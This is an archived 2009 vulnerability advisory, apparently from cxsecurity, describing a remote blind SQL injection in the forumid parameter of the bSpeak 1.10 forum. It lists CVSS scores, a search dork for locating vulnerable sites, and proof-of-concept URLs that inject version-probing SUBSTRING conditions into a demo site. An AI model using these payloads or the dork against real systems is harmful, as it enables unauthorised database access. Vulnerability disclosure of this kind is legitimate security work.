bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability

2009.05.24
Credit: Snakespc
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#-------------------------AllaH AkbaR------------------------------- #forum bspeak v1.10 Blind SQL Injection Exploit #------------------------------------------------------------------- #Discovered By: Snakespc ALGERIAN HaCkEr #Mail: snakespc@gmail.com #Site:http://www.snakespc.com/sc/index.php #Chi3arona houa : Serra7 merra7 , koulchi mderra7>>>> # Aflawa Kamikaz Wa4rin Fi kol Bla4s #-------------------------SNAKES TEAM------------------------------- # #Script:forum (bspeak v1.10) www.26thavenue.com/index.php # #Demo:http://www.26thavenue.com//bspeakdemo/ # #Dork:"Powered by bSpeak 1.10" #--------------------------SNAKES TEAM------------------------------ #Exploit: #-------- #Demo: #http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3' #http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=4 oui :) #http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=5 no :) # #-------------------------SNAKES TEAM------------------------------- #Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL #--------------------------SNAKES TEAM------------------------------ #ALL www.SnakespC.com/sc>>>> ( Members ) >>>>Str0ke >>>>>>>Milw0rm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top